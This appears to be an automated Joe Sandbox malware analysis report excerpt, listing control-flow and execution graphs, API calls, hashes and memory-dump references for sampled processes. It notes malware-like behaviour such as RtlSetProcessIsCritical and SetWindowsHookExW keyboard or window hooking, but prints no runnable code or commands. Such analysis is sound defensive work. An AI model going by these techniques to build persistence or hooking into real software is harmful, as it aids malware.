                                                                                  control_flow_graph 0 7ff630ce15c0-7ff630ce15fc GetStartupInfoW 1 7ff630ce15ff-7ff630ce160a 0->1 2 7ff630ce160c-7ff630ce160f 1->2 3 7ff630ce1627 1->3 4 7ff630ce1611-7ff630ce1618 2->4 5 7ff630ce161a-7ff630ce1625 Sleep 2->5 6 7ff630ce162c-7ff630ce1634 3->6 4->6 5->1 7 7ff630ce1644-7ff630ce164c 6->7 8 7ff630ce1636-7ff630ce1642 _amsg_exit 6->8 10 7ff630ce16a5 7->10 11 7ff630ce164e-7ff630ce166a 7->11 9 7ff630ce16b0-7ff630ce16b8 8->9 13 7ff630ce16ba-7ff630ce16cd _initterm 9->13 14 7ff630ce16d7-7ff630ce16d9 9->14 12 7ff630ce16ab 10->12 15 7ff630ce166e-7ff630ce1671 11->15 12->9 13->14 16 7ff630ce16e5-7ff630ce16ec 14->16 17 7ff630ce16db-7ff630ce16de 14->17 18 7ff630ce1673-7ff630ce1675 15->18 19 7ff630ce1697-7ff630ce1699 15->19 21 7ff630ce16ee-7ff630ce16fc call 7ff630ce19d0 16->21 22 7ff630ce1718-7ff630ce1725 16->22 17->16 20 7ff630ce169b-7ff630ce16a0 18->20 23 7ff630ce1677-7ff630ce167a 18->23 19->12 19->20 24 7ff630ce1806-7ff630ce1823 20->24 21->22 34 7ff630ce16fe-7ff630ce170e 21->34 28 7ff630ce1731-7ff630ce1736 22->28 29 7ff630ce1727-7ff630ce172c 22->29 26 7ff630ce168c-7ff630ce1695 23->26 27 7ff630ce167c-7ff630ce1688 23->27 26->15 27->26 30 7ff630ce173a-7ff630ce1741 28->30 29->24 32 7ff630ce1743-7ff630ce1746 30->32 33 7ff630ce17b7-7ff630ce17bb 30->33 36 7ff630ce174c-7ff630ce1752 32->36 37 7ff630ce1748-7ff630ce174a 32->37 38 7ff630ce17cb-7ff630ce17d4 33->38 39 7ff630ce17bd-7ff630ce17c7 33->39 34->22 40 7ff630ce1762-7ff630ce1796 call 7ff630ce109c 36->40 41 7ff630ce1754-7ff630ce1760 36->41 37->33 37->36 38->30 39->38 44 7ff630ce17a0-7ff630ce17a7 40->44 45 7ff630ce1798-7ff630ce179a exit 40->45 41->36 46 7ff630ce17b5 44->46 47 7ff630ce17a9-7ff630ce17af _cexit 44->47 45->44 46->24 47->46
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1691499035.00007FF630CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF630CE0000, based on PE: true
• Associated: 00000001.00000002.1691474359.00007FF630CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691539369.00007FF630CE4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691539369.00007FF630CE9000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff630ce0000_rKPaQokQ.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                  • String ID:
                                                                                  • API String ID: 642454821-0
                                                                                  • Opcode ID: c6359c6e4283e84ba6e32f8d3b42f24606ddad3b2f0fda16ee4a83a3ea6b4827
                                                                                  • Instruction ID: 850917fc1d605781a93d32662802a44701f065b83b48a82c4bb35652d1a9c4ca
                                                                                  • Opcode Fuzzy Hash: c6359c6e4283e84ba6e32f8d3b42f24606ddad3b2f0fda16ee4a83a3ea6b4827
                                                                                  • Instruction Fuzzy Hash: 27616B36A09642A2FB208F18E84267972B5FF44B5AF542035EE4DC7390DF3CE969E704

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1691499035.00007FF630CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF630CE0000, based on PE: true
• Associated: 00000001.00000002.1691474359.00007FF630CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691539369.00007FF630CE4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691539369.00007FF630CE9000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff630ce0000_rKPaQokQ.jbxd
                                                                                  Similarity
                                                                                  • API ID: Event$ExecuteInformationRegisterShellTransferWrite
                                                                                  • String ID: CalculatorStarted$calculator://
                                                                                  • API String ID: 2334100579-3358960933
                                                                                  • Opcode ID: da07b945c66d87172fb6d385bc7f783503ffd44cdd0073e952ce876dff7d5c78
                                                                                  • Instruction ID: 3fe573d3ef98569c30ab54ed131b9b2eaf1845c5a995e2edb719cb186f6dee1e
                                                                                  • Opcode Fuzzy Hash: da07b945c66d87172fb6d385bc7f783503ffd44cdd0073e952ce876dff7d5c78
                                                                                  • Instruction Fuzzy Hash: CB41F372A08B06A9E7108F20E8467A937B0FF4874EF406136DA4D86764EF7CE25CE744

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 57 7ff630ce1570-7ff630ce15b8 __wgetmainargs
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1691499035.00007FF630CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF630CE0000, based on PE: true
• Associated: 00000001.00000002.1691474359.00007FF630CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691539369.00007FF630CE4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691539369.00007FF630CE9000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff630ce0000_rKPaQokQ.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wgetmainargs
                                                                                  • String ID:
                                                                                  • API String ID: 1709950718-0
                                                                                  • Opcode ID: f3c7ffe37119d5960e29bac784ee999e60dd8015e82a87bdc8af8edc20cfebb1
                                                                                  • Instruction ID: 357dba381cafa47b8b50b4a03c884faeb6fd39c8ec75a2843c94d8555da9948b
                                                                                  • Opcode Fuzzy Hash: f3c7ffe37119d5960e29bac784ee999e60dd8015e82a87bdc8af8edc20cfebb1
                                                                                  • Instruction Fuzzy Hash: 1CE05274E0A647BAEA118B11A84B5A137B4BF5430EB803032C40C97360DF3CB10DEF08

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1691499035.00007FF630CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF630CE0000, based on PE: true
• Associated: 00000001.00000002.1691474359.00007FF630CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691539369.00007FF630CE4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691539369.00007FF630CE9000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff630ce0000_rKPaQokQ.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3266983031-0
                                                                                  • Opcode ID: 3f4a8eccdaacee45f95532b3a06a74df7695b770c7f1d0e3a0e2c0ef18d089ea
                                                                                  • Instruction ID: b48826922af19ce2fc003152a2d7150c94a4de9dee19154a122d11f6e8fd32d9
                                                                                  • Opcode Fuzzy Hash: 3f4a8eccdaacee45f95532b3a06a74df7695b770c7f1d0e3a0e2c0ef18d089ea
                                                                                  • Instruction Fuzzy Hash: A231D735A08B46A1EB108B14F88A369B7B4FF8574AF502039DA8D82764DF7CE55CE704

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1691499035.00007FF630CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF630CE0000, based on PE: true
• Associated: 00000001.00000002.1691474359.00007FF630CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691539369.00007FF630CE4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1691539369.00007FF630CE9000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff630ce0000_rKPaQokQ.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                  • String ID:
                                                                                  • API String ID: 4104442557-0
                                                                                  • Opcode ID: 6d05e97ad7152ad940533a717775fd3e471bf463976c5954689ff5dc2ea8ee6c
                                                                                  • Instruction ID: b0ba24ba15912e500a02b239d4444c5afd4492bd5e40c0cca26291fe9118bfff
                                                                                  • Opcode Fuzzy Hash: 6d05e97ad7152ad940533a717775fd3e471bf463976c5954689ff5dc2ea8ee6c
                                                                                  • Instruction Fuzzy Hash: 68111D32604B819AEB10CF70EC561A933B4FF4875DB452A35EA6E82754DF3CDAA8C240

                                                                                  Execution Graph

                                                                                  Execution Coverage:13.3%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:40
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 30189 65463c1 30190 654635c 30189->30190 30191 65463ca 30189->30191 30196 6547460 30190->30196 30200 6547451 30190->30200 30204 65473f0 30190->30204 30192 654637d 30197 65474a8 30196->30197 30198 65474b1 30197->30198 30208 654712c 30197->30208 30198->30192 30202 65473ed 30200->30202 30201 65474b1 30201->30192 30202->30200 30202->30201 30203 654712c LoadLibraryW 30202->30203 30203->30201 30205 65473ed 30204->30205 30205->30204 30206 65474b1 30205->30206 30207 654712c LoadLibraryW 30205->30207 30206->30192 30207->30206 30209 6547650 LoadLibraryW 30208->30209 30211 65476c5 30209->30211 30211->30198 30212 12e0871 30217 12e08c8 30212->30217 30222 12e0817 30212->30222 30228 12e08d8 30212->30228 30213 12e0889 30218 12e08d8 30217->30218 30233 12e0ce8 30218->30233 30237 12e0ce0 30218->30237 30219 12e093e 30219->30213 30223 12e081d 30222->30223 30224 12e0897 30223->30224 30226 12e0ce8 GetConsoleWindow 30223->30226 30227 12e0ce0 GetConsoleWindow 30223->30227 30224->30213 30225 12e093e 30225->30213 30226->30225 30227->30225 30229 12e08fa 30228->30229 30231 12e0ce8 GetConsoleWindow 30229->30231 30232 12e0ce0 GetConsoleWindow 30229->30232 30230 12e093e 30230->30213 30231->30230 30232->30230 30234 12e0d26 GetConsoleWindow 30233->30234 30236 12e0d56 30234->30236 30236->30219 30238 12e0ce8 GetConsoleWindow 30237->30238 30240 12e0d56 30238->30240 30240->30219
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: P
                                                                                  • API String ID: 0-3110715001
                                                                                  • Opcode ID: 54e79eb0378ac23e3ae905b0084d0d4d34ca200d213da1d5817c775e9c62c9ab
                                                                                  • Instruction ID: 4b9300959d3f121f659c87d81ddf3fba11eabaab4c1c985d2ca57237aeddb743
                                                                                  • Opcode Fuzzy Hash: 54e79eb0378ac23e3ae905b0084d0d4d34ca200d213da1d5817c775e9c62c9ab
                                                                                  • Instruction Fuzzy Hash: E81269307506248FCF14EFA8C550A6EBBB2FF85705F10895CD5029F7A5CB75E90A8B91
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E58,?,?,06547506), ref: 065476B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1870738059.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6540000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 6dfe23526faeeca4b762995cb2fcaec03367b1e9d2c5f9a6f751b7f0b02eeed1
                                                                                  • Instruction ID: 21d0cc6bdc23cb34c0d488fe6a025d5d28c85b206dfe317db774e6265d2c104f
                                                                                  • Opcode Fuzzy Hash: 6dfe23526faeeca4b762995cb2fcaec03367b1e9d2c5f9a6f751b7f0b02eeed1
                                                                                  • Instruction Fuzzy Hash: CB1142B6C002498FCB10DF9AC944ACEFBF5AB88324F14842AD418A7320C374A546CFA5
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E58,?,?,06547506), ref: 065476B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1870738059.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6540000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 8104b196af2cfbd660d3ef69b6d89ab42d32d585b7334f5c789cf2b81f814612
                                                                                  • Instruction ID: 6fabe98d99fcf039152bfdbc03ab3826b9eea004e72ad8645b9cd1115e64f99b
                                                                                  • Opcode Fuzzy Hash: 8104b196af2cfbd660d3ef69b6d89ab42d32d585b7334f5c789cf2b81f814612
                                                                                  • Instruction Fuzzy Hash: 961123B1D002498FDB10DFAAC844ADEFBF5EB89324F14886AD419B7210C375A545CFA4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1818495391.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_12e0000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2863861424-0
                                                                                  • Opcode ID: 590935de4c25bc95f6edc635f2b297e6590ec7282bd60af567efb10605e5a0b0
                                                                                  • Instruction ID: 15092ebddda113f4cd5a089401138b5dd8eb53ac869ccaccd4d071de754c2b3f
                                                                                  • Opcode Fuzzy Hash: 590935de4c25bc95f6edc635f2b297e6590ec7282bd60af567efb10605e5a0b0
                                                                                  • Instruction Fuzzy Hash: 8A1146B1900349CFDB24DFAAC4497DEBBF4EB88324F208829D559A7250C7756945CBA4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1818495391.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_12e0000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2863861424-0
                                                                                  • Opcode ID: a0b8970767c58993ead8e48a006a1e6fb4c34ac11c706fd94d3973ade75f5707
                                                                                  • Instruction ID: 7ed6d856a8276604469d22ce47b17e2efff2f6951fe4ba19bc3392c083f7e8e4
                                                                                  • Opcode Fuzzy Hash: a0b8970767c58993ead8e48a006a1e6fb4c34ac11c706fd94d3973ade75f5707
                                                                                  • Instruction Fuzzy Hash: 691136B1D002498FDB24DFAAC4457DEFFF4EB88324F208819D559A7250CB79A544CBA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 19e12ed8ddfa8760d495fd6deed2476c36d8b2818b851f64f3f055d167a09311
                                                                                  • Instruction ID: ca67c9c31d00859e46953c8305047d0c13d8cc997a6e18dbf8e1a9a00c854ede
                                                                                  • Opcode Fuzzy Hash: 19e12ed8ddfa8760d495fd6deed2476c36d8b2818b851f64f3f055d167a09311
                                                                                  • Instruction Fuzzy Hash: CEC23C34B502189FCF15DB58CD90EADBBB6BF88700F50809AE50AAB365DB31AD45CF61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f491476c22117c9a7af49fc8572cd2d4d64fc2b2685459fddfce1b10fd66ff14
                                                                                  • Instruction ID: f80a3ef4b2d05017a1a059f04d931477ba2d6fb6612e55d9a7c26fcacb246b26
                                                                                  • Opcode Fuzzy Hash: f491476c22117c9a7af49fc8572cd2d4d64fc2b2685459fddfce1b10fd66ff14
                                                                                  • Instruction Fuzzy Hash: 9EA16974B10245DFCF44DB68C994E6EBBF2FF89600B14846AE5169B3A1CB35DC05CBA1
Memory Dump Source
• Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
Strings
Memory Dump Source
• Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
Similarity
• String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
• API String ID: 0-3823777903

Execution Graph

Execution Coverage: 17.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 6
Total number of Limit Nodes: 0
Execution graph (rendered figure; the nodes and edges recovered from the page):
• 7ffd9b27206d -> 7ffd9b27209f (RtlSetProcessIsCritical) -> 7ffd9b272152
• 7ffd9b27282a -> 7ffd9b272e30 (SetWindowsHookExW) -> 7ffd9b272ee1

Control-flow Graph

Legend: Executed / Not Executed (the colour coding of the rendered graph is not recoverable here)
Basic blocks and edges recovered from the page:
• 488: 7ffd9b27206d-7ffd9b272150 (calls RtlSetProcessIsCritical) -> 492, 493
• 492: 7ffd9b272152 -> 493
• 493: 7ffd9b272158-7ffd9b27218d
APIs
Memory Dump Source
• Source File: 00000004.00000002.2942525714.00007FFD9B270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffd9b270000_YsrQekGS.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0

Control-flow Graph

Legend: Executed / Not Executed (the colour coding of the rendered graph is not recoverable here)
Basic blocks and edges recovered from the page:
• 514: 7ffd9b272e08-7ffd9b272e0f -> 515, 516
• 515: 7ffd9b272e11-7ffd9b272e19 -> 516
• 516: 7ffd9b272e1a-7ffd9b272e8d -> 520, 521
• 520: 7ffd9b272e93-7ffd9b272ea0 -> 522
• 521: 7ffd9b272f19-7ffd9b272f1d -> 522
• 522: 7ffd9b272ea2-7ffd9b272edf (calls SetWindowsHookExW) -> 524, 525
• 524: 7ffd9b272ee1 -> 525
• 525: 7ffd9b272ee7-7ffd9b272f18
APIs
Memory Dump Source
• Source File: 00000004.00000002.2942525714.00007FFD9B270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffd9b270000_YsrQekGS.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0

Control-flow Graph

Legend: Executed / Not Executed (the colour coding of the rendered graph is not recoverable here)
Basic blocks and edges recovered from the page:
• 562: 7ffd9b27282a-7ffd9b272e8d -> 566, 567
• 566: 7ffd9b272e93-7ffd9b272ea0 -> 568
• 567: 7ffd9b272f19-7ffd9b272f1d -> 568
• 568: 7ffd9b272ea2-7ffd9b272edf (calls SetWindowsHookExW) -> 570, 571
• 570: 7ffd9b272ee1 -> 571
• 571: 7ffd9b272ee7-7ffd9b272f18
APIs
Memory Dump Source
• Source File: 00000004.00000002.2942525714.00007FFD9B270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffd9b270000_YsrQekGS.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1772440352.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b370000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X7N
                                                                                  • API String ID: 0-3255769998
                                                                                  • Opcode ID: 3b25a529be9a92d21e24886f905fbadf5768b382b7e744af3e70e97f2069e983
                                                                                  • Instruction ID: 17b6ed9e51fb1053007e471de779345da0b86f40a678bc667a81de16ce0161cc
                                                                                  • Opcode Fuzzy Hash: 3b25a529be9a92d21e24886f905fbadf5768b382b7e744af3e70e97f2069e983
                                                                                  • Instruction Fuzzy Hash: 9ED15632B0EACD1FEB65EBA848B59B47BE1EF56210B0941FED05DC70E7DA18AD018341
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7e7cff28e084349eaf7037ebf4ed1a74682c3d52cbcdf39c63a2798f10f90ee6
                                                                                  • Instruction ID: e9c5d399be2edb236f10e11cd2bc1d5a4e18deee4aed40e42901cd425526b427
                                                                                  • Opcode Fuzzy Hash: 7e7cff28e084349eaf7037ebf4ed1a74682c3d52cbcdf39c63a2798f10f90ee6
                                                                                  • Instruction Fuzzy Hash: 4531C63690E7D99FE766ABACA8765E43FA0EF13214F0900F7C099CA0E3E95819558742
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 20cb55496c96ff83eaa2f7844a40f73237409433ad91314041d6d12de95607ed
                                                                                  • Instruction ID: d7374a54795740a99c6ded754c2ee5fe204b50523d6a7dfe678da540724a03d5
                                                                                  • Opcode Fuzzy Hash: 20cb55496c96ff83eaa2f7844a40f73237409433ad91314041d6d12de95607ed
                                                                                  • Instruction Fuzzy Hash: 5B114F7290FBC85FD7539B7888791943FB0EE63251B0A05EBC488CB1B3D5195949C793
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e85914eee19df05d902b803a6f96d9be4633624e0c20f74c19e2738012c5865e
                                                                                  • Instruction ID: faae9d8f811d5bb85c3537ec2b88652077312bc08e3060c37e572664d7bed881
                                                                                  • Opcode Fuzzy Hash: e85914eee19df05d902b803a6f96d9be4633624e0c20f74c19e2738012c5865e
                                                                                  • Instruction Fuzzy Hash: BC311B7190CB4C9FDB189F5CAC4A6B87BE0FB99710F00812FE449C3291CA20B851CBC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771315960.00007FFD9B18D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B18D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b18d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e1e973cd8c8d2b47336079b2e24e4e3efc18812d031d77a8c54e17553147000
                                                                                  • Instruction ID: 62c18203e30d320b5f7cd4d10e48d90ab265bc8473cc2b4a9f2d9f18c3393866
                                                                                  • Opcode Fuzzy Hash: 3e1e973cd8c8d2b47336079b2e24e4e3efc18812d031d77a8c54e17553147000
                                                                                  • Instruction Fuzzy Hash: F541237280EFC84FE7668B2898519523FB0FF52324B0601EFD488CB1A3D625A946C792
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 26001a99c79c6ca781f6dca8ce994191ed91087ba1c0e54115fd955f5ed2d661
                                                                                  • Instruction ID: 38d427c7d4d2d6649b2274c06284a98c09d1f9e58fb6a4367740b9936c0efa8c
                                                                                  • Opcode Fuzzy Hash: 26001a99c79c6ca781f6dca8ce994191ed91087ba1c0e54115fd955f5ed2d661
                                                                                  • Instruction Fuzzy Hash: 7521F83190CB4C4FEB59DFAC984A7E97FF0EB96321F04426BD048C3196DA74A45ACB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                  • Instruction ID: 695a41e6a3268453f63ea608c3ef483d483d8d6c3c36ae7a1d1d4998015c76de
                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                  • Instruction Fuzzy Hash: 9901677121CB0C4FD748EF0CE451AA5B7E0FB95364F10056DE58AC36A5DA36E882CB46
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1772440352.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b370000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: deb124c6871c360649513401f94d689cfc48b0a6449fa53c1ea9585f6215f64d
                                                                                  • Instruction ID: 2fef29d525fd2c9649cca63da04343b5b7d04da8d5075005b1bc5406a6154acd
                                                                                  • Opcode Fuzzy Hash: deb124c6871c360649513401f94d689cfc48b0a6449fa53c1ea9585f6215f64d
                                                                                  • Instruction Fuzzy Hash: C3F09A32B0D9098FD768FA4CE4918A877E0EF5932071200BAE06DC75A7CA29FC408780
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1772440352.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b370000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 33cef8d38df244dbcb9fa5928e592f73bca32594cc4507ba2d2f306e99188057
                                                                                  • Instruction ID: 6b3d5cbd8d49b3fcabaaf870ad1178516e4be9f7b6f89095e05aeec44578e4c4
                                                                                  • Opcode Fuzzy Hash: 33cef8d38df244dbcb9fa5928e592f73bca32594cc4507ba2d2f306e99188057
                                                                                  • Instruction Fuzzy Hash: 96F05E32A4D5498FD768EA5CE4A18A877E0EF4932475600FAE15DC74A7DA25BC40C750
                                                                                  Memory Dump Source
